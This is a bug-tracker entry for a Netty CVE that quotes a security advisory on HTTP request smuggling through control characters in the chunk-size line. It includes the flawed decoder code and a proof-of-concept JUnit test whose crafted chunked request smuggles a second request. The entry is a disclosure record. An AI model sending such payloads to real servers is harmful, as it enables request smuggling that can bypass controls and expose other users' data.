Bug 2536954 (CVE-2026-93566)

Summary: CVE-2026-93566 io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to control characters in the chunk-size line
Product: [Other] Security Response Reporter: OSIDB Bzimport <bzimport>
Component: vulnerabilityAssignee: Product Security <prodsec-ir-bot>
Status: NEW --- QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: ant, anujha, aschwart, asoldano, aszczucz, ataylor, bbaranow, bmaxwell, boliveir, bstansbe, ccranfor, cescoffi, csuconic, dbruscin, dlofthou, drichtar, ehugonne, ewittman, fmariani, fmongiar, gmalinko, gsmet, gtully, istudens, ivassile, iweiss, janstey, jmartisk, jnethert, jpechane, jsherman, jwon, kvanderr, manderse, mcarlett, mosmerov, mposolda, msvehla, nipatil, nwallace, olubyans, ozzy, pantinor, pberan, pdelbell, pesilva, pjindal, pmackay, rgemmell, rgodfrey, rguimara, rkubis, rmartinc, rstancel, rstepani, sbiarozk, ssilvert, sthorger, tbish, tcunning, thjenkin, tlavocat, varjain, vdosoudi, vmuzikar, yfang
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: ---
Doc Text:
A flaw was found in Netty. A remote attacker could exploit this by sending a specially crafted HTTP request that includes control characters within the chunk-size line. This bypasses the intended strict validation, allowing the attacker to inject arbitrary HTTP requests. This vulnerability can lead to HTTP request smuggling, potentially resulting in information disclosure or other unauthorized actions.
Story Points: ---
Clone Of: Environment:
Last Closed: Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description OSIDB Bzimport 2026-09-18 10:02:32 UTC
HTTP Request Smuggling due to control characters in the chunk-size line

A public GitHub Security Advisory (GHSA-rq4j-fc47-9698) describes the following issue:

### Summary
Netty skips strict chunk size line validation when the line has no chunk extension (`;`), so a chunk size line containing an embedded bare CR (e.g. `0\rX`) is accepted instead of rejected, enabling HTTP request smuggling.

### Details
`io.netty.handler.codec.http.HttpObjectDecoder#checkChunkExtensions` only runs the strict validator `HttpChunkLineValidatingByteProcessor` when a `;` is present:

```java
        int extensionsStart = line.bytesBefore((byte) ';');
        if (extensionsStart == -1) {
            return;
        }
```

According to RFC 9112 https://datatracker.ietf.org/doc/html/rfc9112#appendix-A

`chunk-size = 1*HEXDIG`

### PoC

```java
@Test
public void test() {
    String requestStr = "POST / HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Transfer-Encoding: chunked\r\n\r\n" +
            "0\rX\r\n" +
            "\r\n" +
            "GET /smuggled HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Content-Length: 0\r\n" +
            "\r\n";

    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2 (smuggled)
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    assertEquals("/smuggled", request.uri());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
}
```

### Impact
HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

Affected:
- maven:io.netty:netty-codec-http affected >=4.2.0.Final, <=4.2.17.Final; fixed unknown
- maven:io.netty:netty-codec-http affected <=4.1.137.Final; fixed unknown

Fixed versions: see advisory

Advisory: https://github.com/netty/netty/security/advisories/GHSA-rq4j-fc47-9698